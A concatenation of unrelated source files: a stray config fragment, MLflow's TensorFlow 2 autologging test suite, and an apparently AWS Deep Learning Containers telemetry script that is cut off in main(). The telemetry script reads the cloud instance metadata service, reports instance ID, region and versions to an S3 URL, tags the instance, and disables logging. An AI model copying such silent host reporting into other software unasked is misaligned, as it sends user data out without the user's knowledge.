self.config.set_key('checkpoint_height', height)
self.config.set_key('checkpoint_value', value)
self.check_truncate_headers()
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture(params=[True, False])
def manual_run(request):
if request.param:
mlflow.start_run()
yield
mlflow.end_run()
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_ends_auto_created_run(
random_train_data, random_one_hot_labels, fit_variant
):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_persists_manually_created_run(
random_train_data, random_one_hot_labels, fit_variant
):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(
random_train_data, random_one_hot_labels, manual_run, fit_variant, initial_epoch
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
history = model.fit_generator(
generator(), epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
else:
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=num_training_epochs, initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=1,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
manual_run,
callback,
restore_weights,
patience,
initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
assert int(metrics["stopped_epoch"]) - max(1, callback.patience) == restored_epoch
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == max(1, callback.patience) + 1
# Check that MLflow has logged the metrics of the "best" model
assert len(metric_history) == num_of_epochs + 1
# Check that MLflow has logged the correct data
assert history.history["loss"][history.epoch.index(restored_epoch)] == metric_history[-1].value
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback, restore_weights, patience, initial_epoch
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = tf_keras_random_data_run_with_callback(
random_train_data(),
random_one_hot_labels(),
manual_run,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert int(patched_metrics_data["stopped_epoch"]) - max(1, callback.patience) == restored_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert metrics["stopped_epoch"] == 0
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, fit_variant, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
    user-defined callbacks already exist, these new callbacks are added to the
    user-specified ones. This test verifies that the new callbacks are added without
    permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
if positional:
model.fit_generator(generator(), 1, 10, 1, callbacks)
else:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1, callbacks=callbacks)
else:
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels, fit_variant
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(
generator(), epochs=10, steps_per_epoch=1, callbacks=[tensorboard_callback]
)
else:
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels, fit_variant
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, manual_run, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
    Epoch indexing behavior is inconsistent across TensorFlow 2 APIs: tf.Keras uses
    zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
    This test verifies that metrics are produced for tf.Estimator training sessions
    in the boundary case where a model is trained for a single epoch, ensuring that
    we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE, EMBEDDING_DIM, name="embedding", mask_zero=True, input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
LooseVersion(tf.__version__) < LooseVersion("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
|
deep_learning_container.py
|
# Copyright 2018-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import json
import logging
import multiprocessing
import os
import re
import signal
import sys
import botocore.session
import requests
TIMEOUT_SECS = 5
def _validate_instance_id(instance_id):
"""
Validate instance ID
"""
instance_id_regex = r"^(i-\S{17})"
compiled_regex = re.compile(instance_id_regex)
match = compiled_regex.match(instance_id)
if not match:
return None
return match.group(1)
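# Illustrative example: a well-formed ID such as "i-0123456789abcdef0" ("i-" followed
# by 17 non-whitespace characters) matches the pattern and is returned, while shorter
# or differently prefixed strings yield None.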
def _retrieve_instance_id():
"""
Retrieve instance ID from instance metadata service
"""
instance_id = None
url = "http://169.254.169.254/latest/meta-data/instance-id"
response = requests_helper(url, timeout=0.1)
if response is not None and not (400 <= response.status_code < 600):
instance_id = _validate_instance_id(response.text)
return instance_id
def _retrieve_instance_region():
"""
Retrieve instance region from instance metadata service
"""
region = None
valid_regions = [
"ap-northeast-1",
"ap-northeast-2",
"ap-southeast-1",
"ap-southeast-2",
"ap-south-1",
"ca-central-1",
"eu-central-1",
"eu-north-1",
"eu-west-1",
"eu-west-2",
"eu-west-3",
"sa-east-1",
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
]
url = "http://169.254.169.254/latest/dynamic/instance-identity/document"
response = requests_helper(url, timeout=0.1)
if response is not None and not (400 <= response.status_code < 600):
response_json = json.loads(response.text)
if response_json["region"] in valid_regions:
region = response_json["region"]
return region
def _retrieve_device():
return (
"gpu"
if os.path.isdir("/usr/local/cuda")
else "eia"
if os.path.isdir("/opt/ei_tools")
else "neuron"
if os.path.exists("/usr/local/bin/tensorflow_model_server_neuron")
else "cpu"
)
def _retrieve_cuda():
cuda_version = ""
try:
cuda_path = os.path.basename(os.readlink("/usr/local/cuda"))
cuda_version_search = re.search(r"\d+\.\d+", cuda_path)
cuda_version = "" if not cuda_version_search else cuda_version_search.group()
except Exception as e:
logging.error(f"Failed to get cuda path: {e}")
return cuda_version
def _retrieve_os():
version = ""
name = ""
with open("/etc/os-release", "r") as f:
for line in f.readlines():
if re.match(r"^ID=\w+$", line):
name = re.search(r"^ID=(\w+)$", line).group(1)
if re.match(r'^VERSION_ID="\d+\.\d+"$', line):
version = re.search(r'^VERSION_ID="(\d+\.\d+)"$', line).group(1)
return name + version
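# Illustrative example (assumed /etc/os-release contents): ID=ubuntu together with
# VERSION_ID="20.04" would make _retrieve_os return "ubuntu20.04".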
def requests_helper(url, timeout):
response = None
try:
response = requests.get(url, timeout=timeout)
except requests.exceptions.RequestException as e:
logging.error("Request exception: {}".format(e))
return response
def parse_args():
"""
Parsing function to parse input arguments.
    Return: args, which contains parsed input arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"--framework", choices=["tensorflow", "mxnet", "pytorch"], help="framework of container image.", required=True
)
parser.add_argument("--framework-version", help="framework version of container image.", required=True)
parser.add_argument(
"--container-type",
choices=["training", "inference"],
help="What kind of jobs you want to run on container. Either training or inference.",
required=True,
)
args, _unknown = parser.parse_known_args()
fw_version_pattern = r"\d+(\.\d+){1,2}"
assert re.fullmatch(fw_version_pattern, args.framework_version), (
f"args.framework_version = {args.framework_version} does not match {fw_version_pattern}\n"
f"Please specify framework version as X.Y.Z or X.Y."
)
return args
def query_bucket():
"""
GET request on an empty object from an Amazon S3 bucket
"""
response = None
instance_id = _retrieve_instance_id()
region = _retrieve_instance_region()
args = parse_args()
framework, framework_version, container_type = args.framework, args.framework_version, args.container_type
py_version = sys.version.split(" ")[0]
if instance_id is not None and region is not None:
url = (
"https://aws-deep-learning-containers-{0}.s3.{0}.amazonaws.com"
"/dlc-containers-{1}.txt?x-instance-id={1}&x-framework={2}&x-framework_version={3}&x-py_version={4}&x-container_type={5}".format(
region, instance_id, framework, framework_version, py_version, container_type
)
)
response = requests_helper(url, timeout=0.2)
if os.environ.get("TEST_MODE") == str(1):
with open(os.path.join(os.sep, "tmp", "test_request.txt"), "w+") as rf:
rf.write(url)
logging.debug("Query bucket finished: {}".format(response))
return response
def tag_instance():
"""
Apply instance tag on the instance that is running the container using botocore
"""
instance_id = _retrieve_instance_id()
region = _retrieve_instance_region()
args = parse_args()
framework, framework_version, container_type = args.framework, args.framework_version, args.container_type
py_version = sys.version.split(" ")[0]
device = _retrieve_device()
cuda_version = f"_cuda{_retrieve_cuda()}" if device == "gpu" else ""
os_version = _retrieve_os()
tag = f"{framework}_{container_type}_{framework_version}_python{py_version}_{device}{cuda_version}_{os_version}"
tag_struct = {"Key": "aws-dlc-autogenerated-tag-do-not-delete", "Value": tag}
request_status = None
if instance_id and region:
try:
session = botocore.session.get_session()
ec2_client = session.create_client("ec2", region_name=region)
response = ec2_client.create_tags(Resources=[instance_id], Tags=[tag_struct])
request_status = response.get("ResponseMetadata").get("HTTPStatusCode")
if os.environ.get("TEST_MODE") == str(1):
with open(os.path.join(os.sep, "tmp", "test_tag_request.txt"), "w+") as rf:
rf.write(json.dumps(tag_struct, indent=4))
except Exception as e:
logging.error(f"Error. {e}")
logging.debug("Instance tagged successfully: {}".format(request_status))
else:
logging.error("Failed to retrieve instance_id or region")
return request_status
def main():
"""
Invoke bucket query
"""
# Logs are not necessary for normal run. Remove this line while debugging.
logging.getLogger().disabled = True
logging.basicConfig(level=logging.ERROR)
bucket_process = multiprocessing.Process(target=query_bucket)
tag_process = multiprocessing.Process(target=tag_instance)
bucket_process.start()
